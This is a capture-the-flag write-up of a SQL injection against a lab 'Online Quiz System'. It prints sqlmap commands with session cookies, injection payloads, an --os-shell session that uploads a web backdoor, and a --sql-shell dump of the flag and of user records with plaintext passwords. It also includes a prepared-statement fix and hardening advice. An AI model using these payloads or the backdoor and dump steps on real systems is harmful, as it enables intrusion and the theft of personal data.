refer to:
https://yunjing.ichunqiu.com/cve/detail/750?type=1&pay=2
1. Register with any details first, then go to the welcome page.
2. It is easy to tell that the parameter n is the suspicious one:
3. Append a ' to it and try again; sure enough, it throws a database error:
4. So we can hand it straight to sqlmap:
python sqlmap.py -u "http://eci-2ze2v95f49wasfbwy36u.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0" -p "n" -v 1 --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1680592615,1680743198,1680907041; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1680915151; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=8a1dd572910d3c8cc54ff01ff591b5570f28d854; PHPSESSID=jgksjv5p592uciahhhq8ggufbm"
Here are the payloads sqlmap found:
1. boolean based, blind:
2. error based:
3. time based, blind:
4. union based:
As you can see, apart from the first one (boolean based), the rest are all blind injections with no echo point.
Using sqlmap's -a option (dump everything) turned out to produce far too much content, so I did not wait for it to finish. It had already found a trace of the flag, though:
Database: information_schema
Table: INNODB_SYS_DATAFILES
[13 entries]
+----------------------------------+---------+
| PATH                             | SPACE   |
+----------------------------------+---------+
| ./ctf/admin.ibd                  | 16      |
| ./ctf/answer.ibd                 | 7       |
| ./ctf/flag.ibd                   | 5       |
| ./ctf/history.ibd                | 8       |
| ./ctf/options.ibd                | 9       |
| ./ctf/questions.ibd              | 10      |
| ./ctf/quiz.ibd                   | 11      |
| ./ctf/rank.ibd                   | 12      |
| ./ctf/user.ibd                   | 15      |
| ./mysql/gtid_slave_pos.ibd       | 4       |
| ./mysql/innodb_index_stats.ibd   | 2       |
| ./mysql/innodb_table_stats.ibd   | 1       |
| ./mysql/transaction_registry.ibd | 3       |
+----------------------------------+---------+
Using sqlmap's --os-shell feature:
python sqlmap.py -u "http://eci-2ze2v95f49wasfbwy36u.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0" -p "n" -v 1 --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1680592615,1680743198,1680907041; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1680915151; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=8a1dd572910d3c8cc54ff01ff591b5570f28d854; PHPSESSID=jgksjv5p592uciahhhq8ggufbm" --os-shell

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.7.2.8#dev}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:30:57 /2023-04-08/

[09:31:00] [INFO] resuming back-end DBMS 'mysql'
[09:31:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: n (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: q=quiz&step=2&eid=5b141f1e8399e&t=100&n=-6120' OR 4063=4063#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0' OR (SELECT 8784 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(8784=8784,1))),0x717a766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NISw

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0' AND (SELECT 1822 FROM (SELECT(SLEEP(5)))NWDQ)-- ntru

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0' UNION ALL SELECT NULL,CONCAT(0x7162766b71,0x626150514c54736166766c617442464c6b6d78764b426661476f58674345517058476c624c5a6846,0x717a766b71),NULL,NULL,NULL#
---
[09:31:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:31:01] [INFO] going to use a web backdoor for command prompt
[09:31:01] [INFO] fingerprinting the back-end DBMS operating system
[09:31:01] [WARNING] reflective value(s) found and filtering out
[09:31:01] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[09:31:05] [INFO] retrieved the web server document root: '/var/www'
[09:31:05] [INFO] retrieved web server absolute paths: '/var/www/html/welcome.php'
[09:31:05] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[09:31:05] [WARNING] unable to upload the file stager on '/var/www/'
[09:31:05] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[09:31:05] [WARNING] expect junk characters inside the file as a leftover from UNION query
[09:31:05] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[09:31:06] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[09:31:06] [WARNING] unable to upload the file stager on '/var/www/html/'
[09:31:06] [INFO] trying to upload the file stager on '/var/www/html/' via UNION method
[09:31:06] [INFO] the remote file '/var/www/html/tmpukcjn.php' is larger (709 B) than the local file '/tmp/sqlmapdyonyo1w3766/tmp84m96lde' (705B)
[09:31:07] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://eci-2ze2v95f49wasfbwy36u.cloudeci1.ichunqiu.com:80/tmpukcjn.php
[09:31:07] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://eci-2ze2v95f49wasfbwy36u.cloudeci1.ichunqiu.com:80/tmpbfyjf.php
[09:31:07] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> who
do you want to retrieve the command standard output? [Y/n/a]
No output
os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a]
command standard output: '/var/www/html'
os-shell> ll
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'sh: 1: ll: not found'
os-shell> ls -al
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
total 120
drwxrwxrwx 1 www-data www-data  4096 Apr  8 01:31 .
drwxr-xr-x 1 root     root      4096 Jul  9  2019 ..
-rwxrwxrwx 1 root     root     11357 Jun  4  2018 LICENSE
-rwxrwxrwx 1 root     root       789 Jun  4  2018 README.md
-rwxrwxrwx 1 root     root      3298 Jul 15  2019 admin.php
drwxrwxrwx 1 root     root      4096 Jul  9  2022 css
-rwxrwxrwx 1 root     root     14621 Jul 15  2019 dashboard.php
-rwxrwxrwx 1 root     root       120 Jul  6  2022 database.php
drwxrwxrwx 1 root     root      4096 Jul  9  2022 fonts
drwxrwxrwx 1 root     root      4096 Jul  9  2022 image
-rwxrwxrwx 1 root     root      1135 Jun  4  2018 index.php
drwxrwxrwx 1 root     root      4096 Jul  9  2022 js
-rwxrwxrwx 1 root     root      3189 Jun  4  2018 login.php
-rwxrwxrwx 1 root     root       127 Jun  4  2018 logout.php
-rwxrwxrwx 1 root     root       132 Jun  4  2018 logout1.php
-rwxrwxrwx 1 root     root      3648 Jun  4  2018 register.php
drwxrwxrwx 1 root     root      4096 Jul  9  2022 scripts
-rwxr-xr-x 1 www-data www-data   866 Apr  8 01:31 tmpbfyjf.php
-rw-r--r-- 1 mysql    mysql        0 Apr  8 01:31 tmpujmxa.php
-rw-r--r-- 1 mysql    mysql      709 Apr  8 01:31 tmpukcjn.php
-rwxrwxrwx 1 root     root      6881 Feb 25  2021 update.php
-rwxrwxrwx 1 root     root     11673 Jun  4  2018 welcome.php
---
os-shell> cat welcome.php
do you want to retrieve the command standard output?
[Y/n/a]
command standard output:
---
<?php
include_once 'database.php';
session_start();
if(!(isset($_SESSION['email'])))
{
    header("location:login.php");
}
else
{
    $name = $_SESSION['name'];
    $email = $_SESSION['email'];
    include_once 'database.php';
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Welcome | Online Quiz System</title>
    <link rel="stylesheet" href="css/bootstrap.min.css"/>
    <link rel="stylesheet" href="css/bootstrap-theme.min.css"/>
    <link rel="stylesheet" href="css/welcome.css">
    <link rel="stylesheet" href="css/font.css">
    <script src="js/jquery.js" type="text/javascript"></script>
    <script src="js/bootstrap.min.js" type="text/javascript"></script>
</head>
<body>
<nav class="navbar navbar-default title1">
    <div class="container-fluid">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="#"><b>Online Quiz System</b></a>
        </div>
        <!-- Collect the nav links, forms, and other content for toggling -->
        <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
            <ul class="nav navbar-nav navbar-left">
                <li <?php if(@$_GET['q']==1) echo'class="active"'; ?> ><a href="welcome.php?q=1"><span class="glyphicon glyphicon-home" aria-hidden="true"></span> Home<span class="sr-only">(current)</span></a></li>
                <li <?php if(@$_GET['q']==2) echo'class="active"'; ?>> <a href="welcome.php?q=2"><span class="glyphicon glyphicon-list-alt" aria-hidden="true"></span> History</a></li>
                <li <?php if(@$_GET['q']==3) echo'class="active"'; ?>> <a href="welcome.php?q=3"><span class="glyphicon glyphicon-stats" aria-hidden="true"></span> Ranking</a></li>
            </ul>
            <ul class="nav navbar-nav navbar-right">
                <li <?php echo''; ?> > <a href="logout.php?q=welcome.php"><span class="glyphicon glyphicon-log-out" aria-hidden="true"></span> Log out</a></li>
            </ul>
        </div>
    </div>
</nav>
<br><br>
<div class="container">
    <div class="row">
        <div class="col-md-12">
<?php
if(@$_GET['q']==1)
{
    $result = mysqli_query($con,"SELECT * FROM quiz ORDER BY date DESC") or die('Error');
    echo '<div class="panel"><div class="table-responsive"><table class="table table-striped title1">
    <tr><td><center><b>S.N.</b></center></td><td><center><b>Topic</b></center></td><td><center><b>Total question</b></center></td><td><center><b>Marks</center></b></td><td><center><b>Action</b></center></td></tr>';
    $c=1;
    while($row = mysqli_fetch_array($result))
    {
        $title = $row['title'];
        $total = $row['total'];
        $sahi = $row['sahi'];
        $eid = $row['eid'];
        $q12=mysqli_query($con,"SELECT score FROM history WHERE eid='$eid' AND email='$email'" )or die('Error98');
        $rowcount=mysqli_num_rows($q12);
        if($rowcount == 0){
            echo '<tr><td><center>'.$c++.'</center></td><td><center>'.$title.'</center></td><td><center>'.$total.'</center></td><td><center>'.$sahi*$total.'</center></td><td><center><b><a href="welcome.php?q=quiz&step=2&eid='.$eid.'&n=1&t='.$total.'" class="btn sub1" style="color:black;margin:0px;background:#1de9b6"><span class="glyphicon glyphicon-new-window" aria-hidden="true"></span> <span class="title1"><b>Start</b></span></a></b></center></td></tr>';
        }
        else
        {
            echo '<tr style="color:#99cc32"><td><center>'.$c++.'</center></td><td><center>'.$title.' <span title="This quiz is already solve by you" class="glyphicon glyphicon-ok" aria-hidden="true"></span></center></td><td><center>'.$total.'</center></td><td><center>'.$sahi*$total.'</center></td><td><center><b><a href="update.php?q=quizre&step=25&eid='.$eid.'&n=1&t='.$total.'" class="pull-right btn sub1" style="color:black;margin:0px;background:red"><span class="glyphicon glyphicon-repeat" aria-hidden="true"></span> <span class="title1"><b>Restart</b></span></a></b></center></td></tr>';
        }
    }
    $c=0;
    echo '</table></div></div>';
}?>
<?php
if(@$_GET['q']== 'quiz' && @$_GET['step']== 2)
{
    $eid=@$_GET['eid'];
    $sn=@$_GET['n'];
    $total=@$_GET['t'];
    $q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );
    echo '<div class="panel" style="margin:5%">';
    while($row=mysqli_fetch_array($q) )
    {
        $qns=$row['qns'];
        $qid=$row['qid'];
        echo '<b>Question '.$sn.' ::<br /><br />'.$qns.'</b><br /><br />';
    }
    $q=mysqli_query($con,"SELECT * FROM options WHERE qid='$qid' " );
    echo '<form action="update.php?q=quiz&step=2&eid='.$eid.'&n='.$sn.'&t='.$total.'&qid='.$qid.'" method="POST" class="form-horizontal"> <br />';
    while($row=mysqli_fetch_array($q) )
    {
        $option=$row['option'];
        $optionid=$row['optionid'];
        echo'<input type="radio" name="ans" value="'.$optionid.'"> '.$option.'<br /><br />';
    }
    echo'<br /><button type="submit" class="btn btn-primary"><span class="glyphicon glyphicon-lock" aria-hidden="true"></span> Submit</button></form></div>';
}
if(@$_GET['q']== 'result' && @$_GET['eid'])
{
    $eid=@$_GET['eid'];
    $q=mysqli_query($con,"SELECT * FROM history WHERE eid='$eid' AND email='$email' " )or die('Error157');
    echo '<div class="panel"> <center><h1 class="title" style="color:#660033">Result</h1><center><br /><table class="table table-striped title1" style="font-size:20px;font-weight:1000;">';
    while($row=mysqli_fetch_array($q) )
    {
        $s=$row['score'];
        $w=$row['wrong'];
        $r=$row['sahi'];
        $qa=$row['level'];
        echo '<tr style="color:#66CCFF"><td>Total Questions</td><td>'.$qa.'</td></tr> <tr style="color:#99cc32"><td>right Answer <span class="glyphicon glyphicon-ok-circle" aria-hidden="true"></span></td><td>'.$r.'</td></tr> <tr style="color:red"><td>Wrong Answer <span class="glyphicon glyphicon-remove-circle" aria-hidden="true"></span></td><td>'.$w.'</td></tr> <tr style="color:#66CCFF"><td>Score <span class="glyphicon glyphicon-star" aria-hidden="true"></span></td><td>'.$s.'</td></tr>';
    }
    $q=mysqli_query($con,"SELECT * FROM rank WHERE email='$email' " )or die('Error157');
    while($row=mysqli_fetch_array($q) )
    {
        $s=$row['score'];
        echo '<tr style="color:#990000"><td>Overall Score <span class="glyphicon glyphicon-stats" aria-hidden="true"></span></td><td>'.$s.'</td></tr>';
    }
    echo '</table></div>';
}
?>
<?php
if(@$_GET['q']== 2)
{
    $q=mysqli_query($con,"SELECT * FROM history WHERE email='$email' ORDER BY date DESC " )or die('Error197');
    echo '<div class="panel title"> <table class="table table-striped title1" > <tr style="color:black;"><td><center><b>S.N.</b></center></td><td><center><b>Quiz</b></center></td><td><center><b>Question Solved</b></center></td><td><center><b>Right</b></center></td><td><center><b>Wrong<b></center></td><td><center><b>Score</b></center></td>';
    $c=0;
    while($row=mysqli_fetch_array($q) )
    {
        $eid=$row['eid'];
        $s=$row['score'];
        $w=$row['wrong'];
        $r=$row['sahi'];
        $qa=$row['level'];
        $q23=mysqli_query($con,"SELECT title FROM quiz WHERE eid='$eid' " )or die('Error208');
        while($row=mysqli_fetch_array($q23) )
        {
            $title=$row['title'];
        }
        $c++;
        echo '<tr><td><center>'.$c.'</center></td><td><center>'.$title.'</center></td><td><center>'.$qa.'</center></td><td><center>'.$r.'</center></td><td><center>'.$w.'</center></td><td><center>'.$s.'</center></td></tr>';
    }
    echo'</table></div>';
}
if(@$_GET['q']== 3)
{
    $q=mysqli_query($con,"SELECT * FROM rank ORDER BY score DESC " )or die('Error223');
    echo '<div class="panel title"><div class="table-responsive"> <table class="table table-striped title1" > <tr style="color:red"><td><center><b>Rank</b></center></td><td><center><b>Name</b></center></td><td><center><b>Email</b></center></td><td><center><b>Score</b></center></td></tr>';
    $c=0;
    while($row=mysqli_fetch_array($q) )
    {
        $e=$row['email'];
        $s=$row['score'];
        $q12=mysqli_query($con,"SELECT * FROM user WHERE email='$e' " )or die('Error231');
        while($row=mysqli_fetch_array($q12) )
        {
            $name=$row['name'];
        }
        $c++;
        echo '<tr><td style="color:black"><center><b>'.$c.'</b></center></td><td><center>'.$name.'</center></td><td><center>'.$e.'</center></td><td><center>'.$s.'</center></td></tr>';
    }
    echo '</table></div></div>';
}
?>
</body>
</html>
---
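The welcome.php source above shows where the injection comes from: the `q=quiz&step=2` branch copies `eid`, `n` and `t` straight out of `$_GET` into the query string, so the `n=0' OR 4063=4063#` style payloads sqlmap reported become part of the SQL. The following is an added example, not code from the Online Quiz System or from this writeup: that branch rewritten with parameter validation, prepared statements and output escaping. It assumes a mysqli connection in `$con` (as database.php provides in the original) and uses the table and column names visible in the listing (`questions`, `options`, `eid`, `sn`, `qid`, `qns`, `optionid`, `option`); the 13-hex-character shape of `eid` is inferred from the `eid=5b141f1e8399e` value in the URL and is an assumption.

```php
<?php
// Added example, not the project's own code. Assumes $con is the mysqli
// connection opened by database.php, as in the original welcome.php.

// The original, vulnerable shape (kept for contrast): every GET parameter is
// interpolated into the query text, so a quote in $sn rewrites the query.
function load_question_vulnerable(mysqli $con, string $eid, string $sn): ?array
{
    $q = mysqli_query($con, "SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' ");
    return $q ? mysqli_fetch_assoc($q) : null;
}

// 1. Validate the shape of each parameter before it reaches the database.
//    n and t are question counts, eid is a short hex token (assumed format).
function parse_quiz_params(array $get): array
{
    $sn    = filter_var($get['n'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $total = filter_var($get['t'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $eid   = $get['eid'] ?? '';
    if ($sn === false || $total === false || !preg_match('/^[0-9a-f]{1,32}$/', $eid)) {
        throw new InvalidArgumentException('invalid quiz parameters');
    }
    return ['eid' => $eid, 'sn' => $sn, 'total' => $total];
}

// 2. Bind values instead of concatenating them. The statement text reaches
//    the server before the values do, so user input can never change the SQL.
function load_question_safe(mysqli $con, string $eid, int $sn): ?array
{
    $stmt = $con->prepare('SELECT qid, qns FROM questions WHERE eid = ? AND sn = ?');
    $stmt->bind_param('si', $eid, $sn);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

function load_options_safe(mysqli $con, int $qid): array
{
    // `option` is backticked because OPTION is a reserved word in MySQL.
    $stmt = $con->prepare('SELECT optionid, `option` FROM options WHERE qid = ?');
    $stmt->bind_param('i', $qid);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// 3. Escape on output as well: question text and options are rendered into
//    HTML, so stored or reflected content cannot turn into markup or script.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_question(array $params, array $question, array $options): string
{
    $out = '<b>Question ' . esc((string) $params['sn']) . ' ::<br /><br />' . esc($question['qns']) . '</b><br /><br />';
    $action = 'update.php?' . http_build_query([
        'q' => 'quiz', 'step' => 2, 'eid' => $params['eid'],
        'n' => $params['sn'], 't' => $params['total'], 'qid' => $question['qid'],
    ]);
    $out .= '<form action="' . esc($action) . '" method="POST" class="form-horizontal"><br />';
    foreach ($options as $opt) {
        $out .= '<input type="radio" name="ans" value="' . esc((string) $opt['optionid']) . '"> ' . esc($opt['option']) . '<br /><br />';
    }
    return $out . '<br /><button type="submit" class="btn btn-primary">Submit</button></form>';
}

// Usage, replacing the q=quiz&step=2 branch of welcome.php. mysqli is put in
// exception mode so a failed query fails the request instead of being ignored.
if (isset($_GET['q'], $_GET['step']) && $_GET['q'] === 'quiz' && $_GET['step'] === '2') {
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    try {
        $params = parse_quiz_params($_GET);
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        exit('Bad request');
    }
    $question = load_question_safe($con, $params['eid'], $params['sn']);
    if ($question === null) {
        http_response_code(404);
        exit('No such question');
    }
    echo '<div class="panel" style="margin:5%">';
    echo render_question($params, $question, load_options_safe($con, (int) $question['qid']));
    echo '</div>';
}
```

Two things in the session above are worth reading alongside this fix. The `--os-shell` step only worked because the database account was allowed to write files and the document root was world-writable: the `ls -al` listing shows `/var/www/html` as `drwxrwxrwx` with `tmpukcjn.php` owned by `mysql`. Running the application's database user without the FILE privilege and keeping the web root unwritable by the database process closes that escalation even if another injection slips through. The same interpolation pattern also appears in the `history`, `quiz`, `rank` and `user` queries of welcome.php, so every `mysqli_query` with a `'$var'` inside it needs the same prepared-statement treatment, not just the `n` parameter sqlmap happened to hit.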
Finally, let's grab the flag.
Enter the sql-shell:
python sqlmap.py -u "http://eci-2ze2v95f49wasfbwy36u.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0" -p "n" -v 1 --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1680592615,1680743198,1680907041; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1680915151; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=8a1dd572910d3c8cc54ff01ff591b5570f28d854; PHPSESSID=jgksjv5p592uciahhhq8ggufbm" --sql-shell
[09:40:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:40:23] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
[09:40:27] [INFO] fetching SQL SELECT statement query output: 'show databases'
[09:40:27] [WARNING] reflective value(s) found and filtering out
[09:40:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
sql-shell> use ctf;
[09:40:34] [INFO] fetching SQL query output: 'use ctf'
sql-shell> show tables;
[09:40:41] [INFO] fetching SQL SELECT statement query output: 'show tables'
sql-shell> select * from ctf.flag;
[09:40:57] [INFO] fetching SQL SELECT statement query output: 'select * from ctf.flag'
[09:40:57] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[09:40:57] [INFO] fetching columns for table 'flag' in database 'ctf'
[09:40:57] [INFO] the query with expanded column name(s) is: SELECT flag FROM ctf.flag
select * from ctf.flag: 'flag{0613f4db-cc9c-4db4-8614-900d8c8bb353}'
sql-shell> select * from flag;
[09:41:11] [INFO] fetching SQL SELECT statement query output: 'select * from flag'
[09:41:11] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[09:41:11] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:41:11] [INFO] fetching current database
[09:41:11] [INFO] fetched table columns from database 'ctf'
[09:41:11] [INFO] the query with expanded column name(s) is: SELECT flag FROM flag
select * from flag: 'flag{0613f4db-cc9c-4db4-8614-900d8c8bb353}'
sql-shell> select * from admin;
[09:41:16] [INFO] fetching SQL SELECT statement query output: 'select * from admin'
[09:41:16] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[09:41:16] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:41:16] [INFO] fetching current database
[09:41:16] [INFO] fetching columns for table 'admin' in database 'ctf'
[09:41:16] [INFO] retrieved: 'admin_id','int(11)'
[09:41:17] [INFO] retrieved: 'email','varchar(50)'
[09:41:17] [INFO] retrieved: 'password','varchar(500)'
[09:41:17] [INFO] the query with expanded column name(s) is: SELECT admin_id, email, password FROM admin
select * from admin: '1'
sql-shell> select * from user;
[09:41:39] [INFO] fetching SQL SELECT statement query output: 'select * from user'
[09:41:39] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[09:41:39] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:41:39] [INFO] fetching current database
[09:41:39] [INFO] fetching columns for table 'user' in database 'ctf'
[09:41:39] [INFO] retrieved: 'name','varchar(50)'
[09:41:40] [INFO] retrieved: 'college','varchar(100)'
[09:41:40] [INFO] retrieved: 'email','varchar(50)'
[09:41:40] [INFO] retrieved: 'password','varchar(50)'
[09:41:40] [INFO] the query with expanded column name(s) is: SELECT college, email, name, password FROM user
[09:41:40] [INFO] retrieved: '88888888','[email protected]','aaa','88888888'
[09:41:40] [INFO] retrieved: 'kcc','[email protected]','janobe sourcecode','jan'
[09:41:40] [INFO] retrieved: 'National Institute of Science and Technology, Berhampur','[email protected]','Swagatika Padhi','pinky'
[09:41:40] [INFO] retrieved: 'National Institute of Science and Technology, Berhampur','[email protected]','Priyanka Pattnaik','pinka'
select * from user [4]:
[*] 88888888, [email protected], aaa, 88888888
[*] kcc, [email protected], janobe sourcecode, jan
[*] National Institute of Science and Technology, Berhampur, [email protected], Swagatika Padhi, pinky
[*] National Institute of Science and Technology, Berhampur, [email protected], Priyanka Pattnaik, pinka
Not only did we get the flag, we also saw some other information along the way. Interesting, right?
Ta-da!!!